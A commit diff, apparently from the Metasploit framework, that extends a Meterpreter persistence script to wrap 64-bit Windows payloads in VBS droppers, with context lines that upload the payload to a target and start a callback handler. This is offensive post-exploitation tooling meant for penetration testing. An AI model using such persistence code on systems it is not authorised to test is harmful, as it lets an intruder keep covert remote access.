Fix persistence script to support x64 payloads

bug/bundler_fix
OJ 2015-04-19 12:41:51 +10:00
parent 2a327b7c91
commit e7babc4acb
2 changed files with 21 additions and 7 deletions

View File

@ -1121,6 +1121,10 @@ require 'msf/core/exe/segment_appender'
to_exe_vbs(to_win32pe(framework, code, opts), opts) to_exe_vbs(to_win32pe(framework, code, opts), opts)
end end
def self.to_win64pe_vbs(framework, code, opts = {})
to_exe_vbs(to_win64pe(framework, code, opts), opts)
end
# Creates a jar file that drops the provided +exe+ into a random file name # Creates a jar file that drops the provided +exe+ into a random file name
# in the system's temp dir and executes it. # in the system's temp dir and executes it.
# #

View File

@ -72,13 +72,23 @@ end
# Function for Creating persistent script # Function for Creating persistent script
#------------------------------------------------------------------------------- #-------------------------------------------------------------------------------
def create_script(delay,altexe,raw) def create_script(delay,altexe,raw,is_x64)
if altexe if is_x64
vbs = ::Msf::Util::EXE.to_win32pe_vbs(@client.framework, raw, if altexe
{:persist => true, :delay => delay, :template => altexe}) vbs = ::Msf::Util::EXE.to_win64pe_vbs(@client.framework, raw,
{:persist => true, :delay => delay, :template => altexe})
else
vbs = ::Msf::Util::EXE.to_win64pe_vbs(@client.framework, raw,
{:persist => true, :delay => delay})
end
else else
vbs = ::Msf::Util::EXE.to_win32pe_vbs(@client.framework, raw, if altexe
{:persist => true, :delay => delay}) vbs = ::Msf::Util::EXE.to_win32pe_vbs(@client.framework, raw,
{:persist => true, :delay => delay, :template => altexe})
else
vbs = ::Msf::Util::EXE.to_win32pe_vbs(@client.framework, raw,
{:persist => true, :delay => delay})
end
end end
print_status("Persistent agent script is #{vbs.length} bytes long") print_status("Persistent agent script is #{vbs.length} bytes long")
return vbs return vbs
@ -224,7 +234,7 @@ print_status("Running Persistance Script")
print_status("Resource file for cleanup created at #{@clean_up_rc}") print_status("Resource file for cleanup created at #{@clean_up_rc}")
# Create and Upload Payload # Create and Upload Payload
raw = create_payload(payload_type, rhost, rport) raw = create_payload(payload_type, rhost, rport)
script = create_script(delay, altexe, raw) script = create_script(delay, altexe, raw, payload_type.include?('/x64/'))
script_on_target = write_script_to_target(target_dir, script) script_on_target = write_script_to_target(target_dir, script)
# Start Multi/Handler # Start Multi/Handler